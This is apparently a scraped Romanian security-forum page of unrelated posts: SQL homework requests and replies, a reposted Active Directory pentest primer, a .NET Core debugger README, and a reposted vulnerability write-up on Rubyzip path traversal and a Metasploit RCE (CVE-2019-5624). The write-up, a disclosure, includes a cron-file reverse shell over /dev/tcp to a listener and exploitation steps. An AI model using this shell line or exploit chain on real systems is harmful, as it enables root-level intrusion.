Leaderboard

Exercitiile astea is un fel de "astazi invatam adunarea: un mar si cu inca unu, fac doua; cate mere sunt in total daca mai adun alte doua?" Ca sa fiu si pe subiect: 1. get current date, get day of week, case example 2. user defined functions Daca ai de gand sa profesezi candva in IT, iti sugerez putin mai multa atentie si curiozitate fata de cursuri si materialele de curs.

Postez foarte rar in ultima vreme, si stii de ce? Din cauza celor ca tine. Sau daca stau sa ma gandesc, datorita. Principala ta problema este ca vrei respect. Nu stiu ce varsta ai, insa daca ai mai mult de 14 ani, ar fi trebuit sa stii deja ca respectul se castiga, nu se cere. Sau ca sa intru in "tema" acestui thread, "nu se cerseste". Acum sa revenim la problema. Ai venit aici sa ceri ajutorul. Ce te interseaza pe tine ce zice "x" sau "y"? Iti vei rezolva problema daca te iei in gura cu cineva de aici? Sau crezi ca daca nu le raspunzi, esti mai fraier? In momentul in care ai nevoie de ajutor, principalul lucru care ar trebui sa te caracterizeze este sa fii umil. Sau daca nu, vei fi luat la belengher de altii si vei ramane si cu problema nerezolvata, si cu timpul pierdut. Iar daca ai doua joburi, o masina si un apartament, ar trebui sa stii valoarea timpului. Ca tot a venit vorba de timp, sper ca nu mi-am pierdut timpul degeaba scriindu-ti si poate data viitoare vei da dovada de mai multa inteligenta. Trebuie sa intelegi ca un forum este un loc unde niste oameni vin si isi rup niste minute/ore din viata ca unii ca tine si de multe ori, ca mine, cand am avut nevoie, sa inteleaga anumite concepte, sa primeasca ajutor. P.S: Nu vreau sa fiu troll, dar si mie mi se pare ca toata lumea te ia la maciuca.

Si ti-ai creat cont special sa spui asta? anteleg

Iti fac factura daca vrei sa te ajut, pana atunci, mars de aici.

Exploring, Exploiting Active Directory Pen Test Posted on April 20, 2019 by Rajasekar A Active Directory (Pen Test ) is most commonly used in the Enterprise Infrastructure to manage 1000’s of computers in the organization with a single point of control as “Domain Controller”. Performing Penetration Testing of Active Directory is more interesting and are mainly targeted by many APT Groups with a lot of different techniques. We will focus on the basics of Active Directory to understand its components before the attack. Understanding the Active Directory and its Components Directory Service: A Directory Service is a hierarchical structure which map the names of all resources in the network to its network address. It allows store, organize and manage all the network resources and define a naming structure. It makes easier to manage all the devices from a single system Active Directory: Active Directory is a Microsoft Implementation of Directory services. It follows x.500 specification and it works on the application layer of the OSI model. It allows administrators to control all the users and resources in the network from a single server. It stores information about all the users and resources in the network in a single database Directory Service Database. Active Directory at its uses “Kerberos” for Authentication of the users and LDAP for retrieving the directory information. Domain Controller (DC) A Domain Controller is a Windows Server running Active Directory Directory Services in a domain. All the users, user’s information, computers and its policies are controlled by a Domain Controller. Every User must authenticate with the “Domain Controller” to access any resource or service in a domain. It defines the policies for all the users what actions needs can be performed and what level of privileges to be granted etc. It makes the life of administrators easy to manage the users and the computers in the network. Naming Conventions in AD: An Object can be any network resource in the Active Directory Domain. These objects can be Computers, Users, printers etc. A Domain is a logical grouping of objects in the organization. It defines the security boundary and allows objects within the boundary to share the data among each other. It stores information about all the objects within the domain in the domain controller. A Tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalogue which is a Central Repository of information about all the objects. A forest is a collection of one or more trees which share a common Directory Schema, Global Catalogue and Configurations across the organization Kerberos Authentication: Kerberos is an authentication protocol which is used for Single Sign-on (SSO) purposes. The concept of SSO is to authenticate once and use the token to access any service for which you are authorized to. Kerberos Authentication Process follows: Step1: The User sends an “Authentication Service Request (AS_REQ)” to “Key Distribution Centre”(KDC) for “Ticket Granting Ticket (TGT)” with the “User Principle Name (UPN)” and current Timestamp which is encrypted with User password. Step2: KDC decrypts the request (AS_REQ) with the local copy of the User’s password stored in the database and checks the UPN and Timestamp. After verification, it will respond with a reply (AS_REP). It has two levels of encryption one has TGT which is encrypted with KDC’s password and second is Session Key along with expiry Timestamp is encrypted with hash of the user’s password. Step3: Now the User’s machine will cache the TGT and Session Key. This TGT is used when requesting for a service. The session key is being used for further communication with KDC which does not require credentials. All the resources in the domain are available as a service and require service ticket for the same. Step4: Now User’s Machine send a request(TGS_REQ) to KDC for Ticket Granting Service(TGS) along with TGT, Service Principle Name(SPN) which contains the name of the service and its IP Address and port number and Timestamp which is encrypted with session key received in Step2. Step5: KDC will decrypt the request with User’s Session Key and checks the SPN, Timestamp and TGT which is encrypted with the KDC password. If all the details are valid, it will send a reply (TGS_REP) with the TGS encrypted with the password hash of the service provider, Ticket Expiry Timestamp encrypted with AS_REP Session key. Step6: User’s machine will decrypt the request with the session key and extract the TGS ticket. User’s Machine will forward this ticket to the Application as a (AP_REQ), the application decrypts the request with its password and extract the session key and other attributes about the client regarding privileges and groups. It verifies these details and grants the access to the application. This is the total process of the Kerberos authentication implemented in the Active Directory. Attacks on Kerberos: Silver Tickets are the Ticket Granting Service (TGS) which is obtained from the KDC can be forged and is effectively cracked offline to compromise the service machine Golden Tickets are the Ticket Granting Ticket (TGT) which is obtained from the KDC on the AS_REP. It can be forged and cracked offline to compromise the KDC Roasting AS-REP can be performed when the server disables DONT_REQ_PREAUTH, an attacker can request the KDC on behalf of the machine and crack the password offline LDAP is a Lightweights Directory Access Protocol which acts as a communication protocol that defines the methods for accessing the directory services in a domain. It defines the way that data should be presented to the users, it includes various components such as Attributes, Entries, and Directory Information Tree. Reconnaissance: SPN Scanning instead of Port Scanning of all the machines Active Directory can be enumerated in multiple ways as follows: Active Directory can be enumerated even without a Domain Account Active Directory can be enumerated to gather all the Domain and Forests Information, Forest and Domain Trusts many more things without Admin Rights Active Directory can be enumerated to retrieve Privileges accounts, Access Rights of all groups using PowerView Attacks on AD PassTheHash: It is a technique used to pass the NTLM hash of a service to the remote server to login rather than plain text password PassTheCache: Passing the cached credentials of Linux/Unix-based systems which are part of the domain to a windows-based machines to gain access to the system Over-Pass-The-Hash: Obtained NTLM hash can be passed to KDC to grab a valid Kerberos ticket and pass it to another system to gain access Maintaining Access in the Domain: DCSync: Requires Domain Admin or Enterprise Admin permission and pull all the password data to sync with another malicious and stay in the domain DCShadow: Allows register a new domain to add new objects into targeted infrastructure There are many more attacks can be performed to compromise the objects in the Enterprise Active Directory infrastructure. I have listed most commonly performed attacks. I have covered the basics of Active Directory and its necessary conventions which are necessary to learn before going for pen testing. In the next article, i will explain these attacks in details with practical scenarios. Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx Sursa: http://blog.securelayer7.net/exploring-exploiting-active-directory-pen-test/

Debugger for .NET Core runtime The debugger provides GDB/MI or VSCode Debug Adapter protocol and allows to debug .NET apps under .NET Core runtime. Build Switch to netcoredbg directory, create build directory and switch into it: mkdir build cd build Proceed to build with cmake. Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during CMake configure step. It is possible to override them with CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>. Ubuntu CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin macOS cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin Windows cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin" Compile and install: cmake --build . --target install Run The above commands create bin directory with netcoredbg binary and additional libraries. Now running the debugger with --help option should look like this: $ ../bin/netcoredbg --help .NET Core debugger Options: --attach <process-id> Attach the debugger to the specified process id. --interpreter=mi Puts the debugger into MI mode. --interpreter=vscode Puts the debugger into VS Code Debugger mode. --engineLogging[=<path to log file>] Enable logging to VsDbg-UI or file for the engine. Only supported by the VsCode interpreter. --server[=port_num] Start the debugger listening for requests on the specified TCP/IP port instead of stdin/out. If port is not specified TCP 4711 will be used. Sursa: https://github.com/Samsung/netcoredbg

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624) 24 Apr 2019 - Posted by Luca Carettoni During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation. This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit. Rubyzip and old vulnerabilities The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers. # Extracts entry to file dest_path (defaults to @name). # NB: The caller is responsible for making sure dest_path is safe, # if it is passed. def extract(dest_path = nil, &block) if dest_path.nil? && !name_safe? puts "WARNING: skipped #{@name} as unsafe" return self end [...] Entry#name_safe is defined a few lines before as: # Is the name a relative path, free of `..` patterns that could lead to # path traversal attacks? This does NOT handle symlinks; if the path # contains symlinks, this check is NOT enough to guarantee safety. def name_safe? cleanpath = Pathname.new(@name).cleanpath return false unless cleanpath.relative? root = ::File::SEPARATOR naive_expanded_path = ::File.join(root, cleanpath.to_s) cleanpath.expand_path(root).to_s == naive_expanded_path end In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility: # NB: The caller is responsible for making sure dest_path is safe, if it is passed. While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments. In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code: require 'zip' first_arg, *the_rest = ARGV Zip::File.open(first_arg) do |zip_file| zip_file.each do |entry| puts "Extracting #{entry.name}" entry.extract(entry.name) end end $ ls /tmp/file.txt ls: cannot access '/tmp/file.txt': No such file or directory $ zipinfo absolutepath.zip Archive: absolutepath.zip Zip file size: 289 bytes, number of entries: 2 drwxr-xr-x 2.1 unx 0 bx stor 18-Jun-13 20:13 /tmp/ -rw-r--r-- 2.1 unx 5 bX defN 18-Jun-13 20:13 /tmp/file.txt 2 files, 5 bytes uncompressed, 7 bytes compressed: -40.0% $ ruby Rubyzip-poc.rb absolutepath.zip Extracting /tmp/ Extracting /tmp/file.txt $ ls /tmp/file.txt /tmp/file.txt Resulting in a file being created in /tmp/file.txt, which confirms the issue. As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase. It would have been vulnerable anyway ¯\_(ツ)_/¯ In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code: def unzip(input) uuid = get_uuid() # 0. create a 'Pathname' object with the new uuid parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}") Zip::File.open(input[:zip_file].to_io) do |zip_file| zip_file.each_with_index do |entry, index| # 1. check the file is not present next if File.file?(parent_directory + entry.name) # 2. extract the entry entry.extract(parent_directory + entry.name) end end Success end In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior. We can easily understand its behavior in an IRB shell: $ irb irb(main):001:0> require 'pathname' => true irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/") => #<Pathname:/tmp/random_uuid/> irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal")) => #<Pathname:/path> irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal") => #<Pathname:/path/traversal> irb(main):005:0> parent_directory + "../../path/traversal" => #<Pathname:/path/traversal> Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation. From Arbitrary File Write to RCE (RoR Style) Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application. Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot. However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability. The official documentation explains that: After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded. Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot. Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624) Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File: data.entries.each do |e| target = ::File.join(@import_filedata[:zip_tmp], e.name) data.extract(e,target) As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps: Create a file with the following content: * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196" Generate the ZIP archive with the path traversal payload: python evilarc.py exploit --os unix -p etc/cron.d/ Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive) Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell) Login in the MSF Web Interface Create a new “Project” Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button Wait for the import process to finish Enjoy your reverse shell Conclusions In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract. Here is a small recap of the different scenarios (as of Rubyzip v1.2.2😞 Usage Input by user? Vulnerable to path traversal? entry.extract(path) yes (path) yes entry.extract(path) partially (path is concatenated) maybe entry.extract() partially (entry name) no entry.extract() no no If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624. Credits and References Credit for the research and bugs go to @voidsec and @polict. This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support. If you’re interested in the topic, take a look at the following resources: Rubyzip Library Ruby on Rails Guides Attacking Ruby on Rails Applications 1997 Portable BBS Hacking (or when Zip Slip was actually invented) Evilarc blog post (or 2019 and this post is still relevant) Sursa: https://blog.doyensec.com/2019/04/24/rubyzip-bug.html

Download: Buy: You can leave a donation here: https://fundatiamereuaproape.ro/donatii-in-cont/ (PayPal link at the top of the page or bank transfer details at the bottom)

Intreb asa, de curiozitate: Ce ai incercat? Ai citit cursurile? Ai cautat pe Google/DuckDuckGo/Bing/<alte_nume_de_motoare_de_cautare_aici>? Pentru ce varianta de SQL ar trebui implementat (PostgreSQL, MySQL, MSSQL, Oracle, etc)?

brother. Does it have slingshot linux?

Am eu o faza amuzanta...odata eram si eu pe internet si ma uitam pe https://flatfy.ro/case-de-vanzare-bucuresti deoarece voiam sa imi iau o casa. In fine, ma uit eu ce ma uit si dintr-o data vad ca unul voia sa vanda casa cu o fantoma bonus. Cica se vedea in oglinzi si muta chestii. Chiar m-am speriat, dar dupa mi s a parut foarte amuzant.

Hello. Am de rezolvat doua probleme in SQL si nu le dau nicicum de capat. Sunt incepator si as avea nevoie de ajutor pentru a le rezolva. 1. Scrieţi instrucţiunea CASE, care pentru fiecare zi separată din săptămâna va putea să returneze numele zilei, iar prin executarea ei va fi returnat numele zilei care este momentan. 2. Scrieţi funcţia de utilizator definită, care pentru data stabilită va returna numărul de ordine a zilei din săptămână.